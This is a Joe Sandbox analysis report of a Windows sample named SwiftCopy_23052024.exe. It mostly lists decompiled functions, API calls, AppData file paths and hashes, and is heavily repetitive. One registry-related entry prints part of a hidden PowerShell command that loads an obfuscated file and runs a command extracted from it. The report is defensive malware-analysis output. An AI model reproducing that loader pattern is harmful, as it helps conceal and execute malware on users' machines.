Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\$Pz
API String ID: 3248276644-3330806477
Opcode ID: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
Opcode Fuzzy Hash: 6e5c033a035c27754d6853607a5acda36fe127f80b162ed81d790e353b870010
Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405A1E: CharNextA.USER32(?,?,007A0950,?,00405A8A,007A0950,007A0950,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004057D5,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405A2C
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004055DA: CreateDirectoryA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040561D

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes
API String ID: 1892508949-922723700
Opcode ID: b60b719dcfd05061419bc67302b8ab374030b57df3d136300446ba1d825f6cfa
Instruction ID: afd89d35c011052612b9933dc16c135e328f8afd03e06d15a27ba8224079e4e0
Opcode Fuzzy Hash: b60b719dcfd05061419bc67302b8ab374030b57df3d136300446ba1d825f6cfa
Instruction Fuzzy Hash: AC112731508141EBDB217FB54D4197F36B49E96324F28453FE4D1B22E2DA3D4842AA2E

Function 00405ED4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Execute: ,?,?,?,?,00000002,Execute: ,?,00406118,80000002), ref: 00405F1A
RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,Execute: ,Execute: ,Execute: ,?,Execute: "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommereg), ref: 00405F25

Strings

Execute: , xrefs: 00405ED7, 00405F0B

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CloseQueryValue
String ID: Execute:
API String ID: 3356406503-3756222843
Opcode ID: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
Opcode Fuzzy Hash: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8

Function 0040568C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
CloseHandle.KERNEL32(?), ref: 004056C2

Strings

Error launching installer, xrefs: 0040569F

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
Instruction ID: 2140ebbf1eee4cb4891f52a8ff1fd75339fa61df53f1a1a9c1e04f6e33d43294
Opcode Fuzzy Hash: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
Instruction Fuzzy Hash: 40E0BFF5610209BFEB009FA4DE05F7B7BBDEB40704F404925BD10F2160D774A8148A78

Function 0040254C Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402591
RegCloseKey.ADVAPI32(?,?,?,cyanitic\srgetogene\runna,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 4bc71aaf0df9787448a4b78a025444603ce3ab24e31e778fceb5895004ee49f9
Instruction ID: dbd097197b1ddcdec4c3bfd44c4d49ca57d6fe8d8a156bba66eafe5791494d89
Opcode Fuzzy Hash: 4bc71aaf0df9787448a4b78a025444603ce3ab24e31e778fceb5895004ee49f9
Instruction Fuzzy Hash: D801BCB1901204FFE711DF699E89ABF7ABCEB81344F10403EF442B62C0D6B84E009629

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
Instruction ID: e022dd21a705f7d2fe13c48a1103892d377d282aa69ae92f3ff2ae7c0e9cbe23
Opcode Fuzzy Hash: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B2A36A8E751354F10813FF955F65F2D678CC028B4C

Function 004023E8 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402409
RegCloseKey.ADVAPI32(00000000), ref: 00402412

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: d608425471dd041c051216504e5fa272264ba2beaad5a7b0b87ca32620c0c4b2
Instruction ID: 49501c94728b366df12ca2e4d909b612e79837c42632e001697d6088b151e408
Opcode Fuzzy Hash: d608425471dd041c051216504e5fa272264ba2beaad5a7b0b87ca32620c0c4b2
Instruction Fuzzy Hash: 5BF0BB32A00120ABD701AFB89B4DBAE72B99B54314F15417FF502B72C1D5FC5E01876D

Function 00406385 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

Part of subcall function 00406317: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
Part of subcall function 00406317: wsprintfA.USER32 ref: 00406367
Part of subcall function 00406317: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
Instruction ID: 1c2fb029b914f91a359858a8292288339c30c15ea481b8388e8a6490942e710a
Opcode Fuzzy Hash: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
Instruction Fuzzy Hash: C3E086326042105BD62156709E0493B62ACDF84700306083EFE47F2240D73CDC31A6A9

Function 00405B86 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\SwiftCopy_23052024.exe,80000000,00000003), ref: 00405B8A
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Function 00405B61 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
Instruction ID: cc84bc49ba1b043e1d2796ac572287907eda555ef0407ac86e19afeaae62c947
Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
Instruction Fuzzy Hash: 7FD0C972504425AFC2102728AE0C89BBB65DB542B17028A35FDA5A22B1DB304C569A99

Function 00405657 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040323B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040565D
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040566B

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: c315ded7713b9b4a851445b4695441f34a70141ed77257200a8001455a195bbd
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: 33C08C30200501DBD6000B308F08F073A51AB80780F01883E608AE00B0CA318055CD2E

Function 00402363 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

